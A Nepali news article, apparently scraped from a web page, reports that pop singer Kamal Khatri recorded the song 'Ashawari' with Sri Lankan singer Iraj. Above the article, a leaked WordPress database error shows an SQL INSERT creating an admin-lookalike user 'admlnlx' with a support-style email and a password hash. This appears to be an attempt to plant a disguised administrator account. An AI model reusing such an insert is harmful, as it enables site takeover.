WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWCO7iam6/D.4b42YW2jTDr.zLQXI6.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 08:33:55', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ १६ –
पप गायक कमल खत्रीले श्रीलंकन गायक इराज सँग गीत गाएका छन् । विभिन्न देशका गायकसँग गीत गाउँदै आएका इराजले कमलसँग पनि गीत गाएका हुन् ।
“इराजकै कम्पोजिशनमा मैले गीत गाएको हुँ,” कमलले भने, “उहाँले ट्रयाक पठाइदिनु भएको थियो । त्यही मेलोडीमा गीत गाएको हुँ ।” इराजले अमेरिकन तथा अफ्रिकन मुलका विभिन्न देशका कलाकारसँग गीत गाउँदै आएका छन् ।
कमलले नेपाली भाषामै गीत गाएका हुन् । यो गीत श्रीलंकन भाषामा पनि छ ।
नेपालमै खिचिएको भिडियोलाई थप परिमार्जन गरेर इराजले नै भिडियो पनि तयार पारेका छन् । ुआशावारीु बोलको गीतको भिडियोमा कमल पनि देखिन्छन् ।
इराजको संगीत रहेको गीतमा शब्द कमल खत्री र हिमांसु रायमाझीको हो । भिडियो निर्देशन प्रियांगा रनसिंगेले गरेका छन् ।
“नेपाली संगीतलाई अन्तर्राष्टियकरण गर्ने यो एउटा अवसर पनि हो,” कमल भन्छन्, “यसैगरी विभिन्न भाषा र विभिन्न देशका कलाकारमार्फत हामी नेपाली संगीतलाई विश्व सामु लैजान सक्छौं ।”